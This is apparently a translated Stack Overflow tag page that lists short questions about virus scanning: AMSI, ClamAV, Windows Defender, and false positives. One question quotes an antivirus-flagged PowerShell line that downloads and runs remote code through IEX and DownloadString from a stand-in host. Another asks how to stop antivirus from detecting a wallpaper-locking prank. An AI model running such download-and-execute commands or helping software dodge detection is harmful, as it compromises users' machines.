问题标签 [virus-scanning]
For questions regarding programming in ECMAScript (JavaScript/JS) and its various dialects/implementations (excluding ActionScript). Note JavaScript is NOT the same as Java! Please include all relevant tags on your question; e.g., [node.js], [jquery], [json], [reactjs], [angular], [ember.js], [vue.js], [typescript], [svelte], etc.
windows - Windows 反恶意软件扫描接口线程安全
Windows 反恶意软件扫描接口 (AMSI) 包含可用于调用 Windows 中当前活动的病毒扫描程序的抽象:
https://docs.microsoft.com/en-us/windows/desktop/amsi/antimalware-scan-interface-functions
初始化相关的方法有2种:
- 初始化
- AmsiUninitialize
AmsiInitialize 返回“HAMSICONTEXT类型的句柄,必须将其传递给对 AMSI API 的所有后续调用。 ”。
初始化完成后,我可以使用 AmsiScanBuffer 扫描缓冲区中的恶意软件。
我的问题:
我可以从我的应用程序中的多个线程同时使用相同的上下文,还是需要为每个线程创建一个我要从中调用方法的线程?
阅读 AsmiUnitialize 的文档,它告诉我当应用程序使用 AMSI API 完成时,它必须调用 AmsiUninitialize。. 这告诉我上下文可以用于许多调用,但它并没有告诉我有关线程安全或并发性的任何信息。
batch-file - 如何修复此 md5 扫描仪不删除受感染的恶意软件文件?
我正在使用运行 Windows 10 的 Hyper-V VM 对完成的 md5 恶意软件扫描程序进行 QC 检查。扫描程序没有删除从https://virusshare.com提供的恶意软件样本,其中哈希值包含在扫描程序数据库中,并且是最新的。
我已经尝试恢复到原来的 SachaDee 的代码,但它没有用。这可能是由于环境变量在某处设置不当所致。
我希望
将 output.txt 中的哈希与恶意软件哈希库进行比较,并删除任何恶意文件(如果可能,提示用户),但代码根本没有删除任何文件。
附加信息; 示例输出.txt
.net-core - 在 Windows 2008 R2 或 2016 中使用 C# 使用反恶意软件扫描接口 (AMSI)
我正在使用 Dotnet 核心 API 中的 (AMSI) 来扫描受病毒感染的文件,它在 windows 10 上运行良好但在生产中,我们有 windows 2008r2,它不提供 (AMSI)。
在服务器 2008 r2 或任何其他 Windows 服务器版本上使用 (AMSI) 也是可能的。
node.js - 使用 lambda 扫描 AWS S3 存储桶中的文件以查找病毒
我们需要扫描用户上传的文件,检查是否有病毒,然后将其标记为受感染。我检查了一些博客和其他 stackoverflow 答案,并知道我们可以使用冷静扫描。
但是,我对 clamscan 配置中病毒扫描的路径感到困惑。另外,有没有教程可以参考。我们的应用程序后端位于 Node.js 中。
我也对其他图书馆/服务开放
windows - dhcpsapi.exe 文件在任务管理器中继续运行
我有一个描述为“Подключаемый модуль пересылки событий WS-Management”的文件,名称为 dhcpsapi.exe 在任务管理器中运行。对我来说,这似乎是一种病毒。每当我尝试删除或打开其位置时,我的管理员帐户都会拒绝访问。尝试从 cmd-Administrator 中删除它,但不断收到错误“访问被拒绝”。
我在文件资源管理器或隐藏文件中看不到它的文件夹,但可以在命令提示符 (dir /a) 中看到它。我需要访问此文件夹并将其删除。我如何从命令提示符或 Windows 资源管理器访问它。 文件属性截图
java - 我们能否对通过 IBM Cloud(Bluemix)中的门户上传的文件进行病毒扫描
我们能否对通过 IBM Cloud(Bluemix) 中的门户上传的文件进行病毒扫描。如果是这样,Docker 或任何其他组件提供的功能。
Devops 团队无法找出任何可以帮助扫描的可用灵魂/功能,是否可以通过代码进行扫描,或者我们是否可以在云中进行扫描,方法是什么。
excel - 附加到电子邮件时带有标记为“病毒”的 API 调用的 XLSM
我找到了复制到剪贴板的解决方案:Excel 2013 64-bit VBA: Clipboard API doesn't work
我将它添加到我的代码中,一切都很好。但是,当我将它附加到电子邮件以将其发送到我的工作计算机时,Gmail 犹豫了,说检测到病毒。在我从上面的链接中删除代码后,Gmail 对继续发送邮件毫不犹豫。
我想知道此代码是否有特定内容,Gmail 是否不喜欢 API 调用,或者 Gmail 检测到病毒是否有其他原因。此外,如果有任何变通方法可以确定文件中没有病毒。
c# - 我如何改进我的程序以使 eScan 不会认为它是病毒?
这是我的课:
这只是一个小恶作剧,使用户无法更改他的壁纸。但是现在我无法构建它,因为 eData 立即说它是“Variant.Razy.587029”病毒。我可以理解它认为它是一种病毒,那么有没有办法改进我的代码使其看起来不可疑?我没有卡巴斯基的问题。而且我无法更改病毒扫描设置,因为它显然不是我的电脑
编辑:我还没有完成,例如 CheckWallpaper() 总是输出false,我只是想测试它。
EDIT2:我现在将墙纸检查从“在注册表中查找”更改为“%appdata%/Roaming/Microsoft/Windows/Themes/TranscodedWallpaper与我的 Image.png 比较。我还添加了一个Thread.Sleep(1000),否则程序会再次被检测到”
powershell - 可疑的 PowerShell 命令
我的防病毒软件不断通过下面提到的 powershell 命令提醒我。我对 Powershell 有点熟悉,但不明白 powershell 脚本下面的作用。另外最重要的是我想知道命令行中使用的“-e”参数是什么
可疑的命令行:
powershell -e sqbfafgakaboaguadwatae8aygbqaguaywb0acaatgblahqalgbxaguaygbdagwaaqbl
可疑脚本:
IEX(New-Object Net.WebClient).DownloadString('https://example.org/xmpsdh')
c# - 如何在 C# 中使用 Window Defender 扫描上传文档的病毒
我想使用 c# 扫描上传的文档。目前,我在我的机器中使用窗口防御者